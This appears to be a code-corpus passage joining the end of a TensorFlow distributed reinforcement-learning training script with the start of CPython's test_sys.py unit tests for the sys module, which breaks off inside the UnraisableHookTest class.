start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Final Win_rate:', win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
